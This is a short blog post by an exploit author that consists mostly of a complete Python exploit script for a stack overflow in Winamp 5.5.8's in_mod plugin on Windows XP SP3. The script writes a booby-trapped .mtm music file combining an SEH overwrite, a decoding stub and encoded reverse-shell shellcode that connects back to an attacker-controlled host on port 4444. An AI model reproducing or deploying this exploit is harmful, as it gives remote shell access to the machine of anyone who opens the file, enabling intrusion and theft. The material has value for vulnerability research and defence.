Shut Up and Hack

I like reading more than writing, and, in fact, I don't write too much.

Dear Winamp...

Finally got time to finish what I started. A POC was already been released at The Exploit Database Blog (without proper shellcode) here.

However while developing our exploit we gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn’t sleep and decided to finish cooking this version.

Have a look here: Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit (SEH).

Exploit Code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
#!/usr/bin/python
# finally got time to finish what I started...
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow (SEH)
# WINDOWS XP SP3 EN Fully Patched
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC and Exploit by @fdiskyou
# e-mail: rui at deniable.org
# This POC was already been released here (without proper shellcode): http://www.exploit-db.com/winamp-5-58-from-dos-to-code-execution/
# We later gave up on SEH and went straight for direct EIP overwrite, yesterday I couldn't sleep and decided to finish cooking this version.
# Further References:
# http://www.exploit-db.com/winamp-exploit-part-2/
# http://www.exploit-db.com/exploits/15287/
# Special thanks to Mighty-D, Ryujin and all the Exploit-DB Dev Team.

header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C" * 16
nopsled = "\x90" * 58331

# windows/shell_reverse_tcp LHOST=192.168.33.114 LPORT=4444 (script kiddie unfriendly)
# bad chars: \x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x10\x11\x12\x13\x0a\x0b\x0c\x0d\x0e\x0f
shellcode = ("\x89\xe1\xda\xd7\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4d\x38\x4d\x59\x43\x30"
"\x43\x30\x45\x50\x43\x50\x4d\x59\x4b\x55\x56\x51\x58\x52\x43"
"\x54\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b"
"\x51\x42\x54\x54\x43\x42\x51\x38\x54\x4f\x58\x37\x51"
"\x5a\x56\x46\x50\x31\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x58\x47\x5a\x42\x5a\x50\x51\x42\x50\x57\x4c\x4b"
"\x51\x42\x54\x50\x4c\x4b\x47\x32\x47\x4c\x45\x51\x4e\x30\x4c"
"\x4b\x47\x30\x43\x48\x4d\x55\x4f\x30\x43\x44\x50\x4a"
"\x4e\x30\x50\x50\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47"
"\x50\x43\x31\x4e\x33\x4b\x53\x47\x4c\x50\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x49\x50\x4e"
"\x4c\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x47\x48\x4b\x50"
"\x52\x55\x4b\x44\x43\x33\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x47"
"\x54\x54\x35\x4b\x52\x51\x48\x56\x38\x56\x44\x43\x31"
"\x49\x43\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45"
"\x4c\x45\x51\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x58\x50"
"\x4d\x59\x50\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x56"
"\x39\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x52\x48\x47\x43\x50"
"\x32\x43\x30\x52\x48\x52\x57\x52\x53\x50\x32\x51\x4f"
"\x51\x44\x52\x48\x50\x4c\x54\x37\x47\x56\x54\x47\x4b\x4f\x49"
"\x45\x4e\x58\x4c\x50\x45\x51\x43\x30\x43\x30\x56\x49"
"\x51\x44\x56\x30\x52\x48\x56\x49\x4d\x50\x52\x4b\x43\x30\x4b"
"\x4f\x58\x55\x50\x50\x50\x50\x50\x50\x50\x50\x51\x50\x56\x30"
"\x51\x50\x56\x30\x52\x48\x4b\x5a\x54\x4f\x4b\x50\x4b"
"\x4f\x49\x45\x4b\x39\x58\x47\x43\x58\x4f\x30\x4f\x58\x47\x51"
"\x54\x32\x45\x38\x45\x52\x43\x30\x54\x51\x51\x4c\x4c\x49\x5a"
"\x46\x52\x4a\x52\x30\x51\x46\x45\x38\x4d\x49\x4e\x45"
"\x43\x44\x45\x31\x4b\x4f\x58\x55\x45\x38\x43\x53\x52\x4d\x45"
"\x34\x45\x50\x4b\x39\x5a\x43\x56\x37\x56\x37\x50\x57\x56\x51"
"\x4c\x36\x52\x4a\x50\x59\x51\x46\x5a\x42\x4b\x4d\x45"
"\x36\x4f\x37\x51\x54\x47\x54\x47\x4c\x45\x51\x43\x31\x4c\x4d"
"\x51\x54\x56\x44\x52\x30\x49\x56\x43\x30\x51\x54\x51\x44\x56"
"\x30\x50\x56\x50\x56\x47\x36\x50\x56\x50\x4e\x50\x56"
"\x51\x46\x56\x33\x56\x36\x52\x48\x52\x59\x58\x4c\x47\x4f\x4c"
"\x46\x4b\x4f\x58\x55\x4d\x59\x4b\x50\x50\x4e\x50\x56"
"\x4b\x4f\x56\x50\x43\x58\x45\x58\x4b\x37\x45\x4d\x43\x50\x4b"
"\x4f\x58\x55\x4f\x4b\x4c\x30\x4f\x45\x4e\x42\x56\x36\x52\x48"
"\x4e\x46\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x47\x4c\x43"
"\x36\x43\x4c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x43\x45\x43\x35"
"\x4f\x4b\x51\x57\x45\x43\x43\x42\x52\x4f\x43\x5a\x45\x50\x51"
"\x43\x4b\x4f\x58\x55\x45\x5a")

prepare_shellcode = "\x90" * 40
prepare_shellcode += "\x90\x33\xDB"             # xor ebx,ebx
prepare_shellcode += "\x54\x5B"                 # push esp - pop ebx
prepare_shellcode += "\x81\xEB\x17\xCB\xFF\xFF" # sub ebx,-34E9
prepare_shellcode += "\x83\xc3\x3B"             # add ebx,3B
prepare_shellcode += "\x83\xEB\x22"             # sub ebx,22
prepare_shellcode += "\x80\x2B\xDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xC2"             # sub byte ptr ds:[ebx],0c2
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBE"             # sub byte ptr ds:[ebx],0be
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1"             # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC8"             # sub byte ptr ds:[ebx],0c8
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xB9"             # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA"             # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD9"             # sub byte ptr ds:[ebx],0D9
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xB9"             # sub byte ptr ds:[ebx],0B9
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC1"             # sub byte ptr ds:[ebx],0c1
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC"             # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD6"             # sub byte ptr ds:[ebx],0D6
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xCA"             # sub byte ptr ds:[ebx],0CA
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xDA"             # sub byte ptr ds:[ebx],0da
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4"             # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x90" * 4
prepare_shellcode += "\x80\x2B\xB6"             # sub byte ptr ds:[ebx],0B6
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xC4"             # sub byte ptr ds:[ebx],0c4
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xBB"             # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD3"             # sub byte ptr ds:[ebx],0D3
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x80\x2B\xBB"             # sub byte ptr ds:[ebx],0BB
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD8"             # sub byte ptr ds:[ebx],0D8
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xB7"             # sub byte ptr ds:[ebx],0B7
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD4"             # sub byte ptr ds:[ebx],0d4
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xBC"             # sub byte ptr ds:[ebx],0BC
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xB4"             # sub byte ptr ds:[ebx],0B4
prepare_shellcode += "\x90" * 6
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xBF"             # sub byte ptr ds:[ebx],0BF
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xD5"             # sub byte ptr ds:[ebx],0D5
prepare_shellcode += "\x83\xc3\x3F"             # add ebx,3F
prepare_shellcode += "\x83\xEB\x16"             # sub ebx,16
prepare_shellcode += "\x80\x2B\xCC"             # sub byte ptr ds:[ebx],0CC
prepare_shellcode += "\x43"                     # inc ebx
prepare_shellcode += "\x80\x2B\xC9"             # sub byte ptr ds:[ebx],0C9
prepare_shellcode += "\x90"*305

nseh = "\xeb\x30\x90\x90"
seh = "\x3f\x28\xd1\x72"     # 0x72D1283F - ppr - msacm32.drv - Windows XP SP3 EN
payload = header + nopsled + nseh + seh + prepare_shellcode + shellcode + "\x90" * 100

file = open("sploit.mtm", "w")
file.write(payload)
file.close()

print "sploit.mtm file generated successfuly"